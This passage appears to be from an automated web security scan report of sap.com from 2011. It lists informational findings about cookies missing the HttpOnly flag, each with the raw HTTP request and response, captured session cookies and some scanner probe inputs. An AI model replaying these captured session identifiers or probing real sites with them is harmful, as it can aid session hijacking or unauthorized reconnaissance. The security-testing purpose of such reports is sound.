Referer: http://www.sapphirenow.com/login.aspx?ReturnUrl=%2fdefault.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fforums.sdn.sap.com%2fthread.jspa%3fthreadID%3d2059162%26tstart%3d0; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690514391%3B%20pe%3Dno%2520value%7C1318690514393%3B%20c3%3Dno%2520value%7C1318690514395%3B%20s_nr%3D1318688714402-New%7C1321280714402%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292314404%3B%20s_visit%3D1%7C1318690514405%3B%20gpv_p47%3Dno%2520value%7C1318690514407%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D3%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:25:48 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:25:48 GMT; path=/
Set-Cookie: CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapphirenow.com%2flogin.aspx%3fReturnUrl%3d%2fdefault.aspx; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:25:48 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:25:47 GMT
Content-Length: 21

var sap_token = null;
12.72. http://www.sap.com/hana/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /hana/index.epx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hana/index.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23602
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:17 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:17 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0003,9|INDUSTRY=INDA000003,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:02:17 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:02:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...
12.73. http://www.sap.com/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /index.epx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.epx HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapvirtualevents.com/teched/default.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; mbox=session#1318688512533-813903#1318690710|check#true#1318688910; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2fdefault.aspx; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:30:34 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:30:34 GMT; path=/
Set-Cookie: CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2fdefault.aspx; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:30:34 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:30:34 GMT
Content-Length: 20385


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...
12.74. http://www.sap.com/lines-of-business/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /lines-of-business/index.epx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /lines-of-business/index.epx?_=1318688587604 HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; mbox=check#true#1318688580|session#1318688512533-813903#1318690380; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:40:16 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:40:16 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:40:16 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:40:16 GMT
Content-Length: 24664


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...
12.75. http://www.sap.com/lines-of-business/lines-of-business-spotlight.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /lines-of-business/lines-of-business-spotlight.epx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /lines-of-business/lines-of-business-spotlight.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 22042
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:05 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:05 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000009,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:02:05 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:02:04 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...
12.76. http://www.sap.com/news-reader/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /news-reader/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news-reader/?articleID=17603&_=1318690575808 HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-SAP-Referer: http://www.sap.comzzzzzz=yyyyy
Referer: http://www.sap.com/index.epx
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; session=cd0b6b7c-45df-415c-9ca0-02363c80f71d; SAP.TTC=1318688442; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; 37021986-VID=546022977410; 37021986-SKEY=449600187523043155; HumanClickSiteContainerID_37021986=STANDALONE; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=check#true#1318690607|session#1318690546019-990768#1318692407

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Location: /news-reader/index.epx?articleID=17603&_=1318690575808
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:01:52 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:01:52 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:01:51 GMT

12.77. http://www.sap.com/news-reader/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /news-reader/index.epx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news-reader/index.epx?articleID=17603&_=1318690575808 HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sap.com/index.epx
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; session=cd0b6b7c-45df-415c-9ca0-02363c80f71d; SAP.TTC=1318688442; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; 37021986-VID=546022977410; 37021986-SKEY=449600187523043155; HumanClickSiteContainerID_37021986=STANDALONE; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=check#true#1318690607|session#1318690546019-990768#1318692407

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:01:55 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:01:55 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:01:55 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:01:55 GMT
Content-Length: 50791


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...
12.78. http://www.sap.com/partners/partnerwithsap/business-objects-crystal/north-american-resellers.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /partners/partnerwithsap/business-objects-crystal/north-american-resellers.epx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /partners/partnerwithsap/business-objects-crystal/north-american-resellers.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 42472
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:27 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:27 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0003,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:02:27 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:02:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
12.79. http://www.sap.com/print/sme/search/SAP_nn6.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /print/sme/search/SAP_nn6.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /print/sme/search/SAP_nn6.js HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 33815
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:47 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:47 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:02:47 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
12.80. http://www.sap.com/print/zzzzzz=yyyyy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /print/zzzzzz=yyyyy

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /print/zzzzzz=yyyyy HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 33727
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:46 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:46 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:02:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
12.81. http://www.sap.com/search/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /search/index.epx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search/index.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 22185
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:20 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:20 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0003,9|INDUSTRY=INDA000003,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:02:20 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:02:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...
12.82. http://www.sap.com/search/search-results.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /search/search-results.epx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /search/search-results.epx HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
Content-Length: 64
Cache-Control: max-age=0
Origin: http://www.sap.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; mbox=check#true#1318688580|session#1318688512533-813903#1318690380; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

searchsite-input=sql+data+orm+faq+contact+help+phone+123+456+789

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:24:10 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:24:10 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:24:11 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:24:10 GMT
Content-Length: 26041


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...
12.83. http://www.sap.com/siteservice.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /siteservice.epx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /siteservice.epx?kNtBzmUK9zU=1 HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
Content-Length: 55
Origin: http://www.sap.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; mbox=check#true#1318688580|session#1318688512533-813903#1318690380; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

suggest:sql data orm faq contact help phone 123 456 789

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:23:56 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:23:56 GMT; path=/
Set-Cookie: SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:23:56 GMT

12.84. http://www.sap.com/sme/howtobuy/solution_adviser.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /sme/howtobuy/solution_adviser.epx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sme/howtobuy/solution_adviser.epx HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/sme/solutions/businessmanagement/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
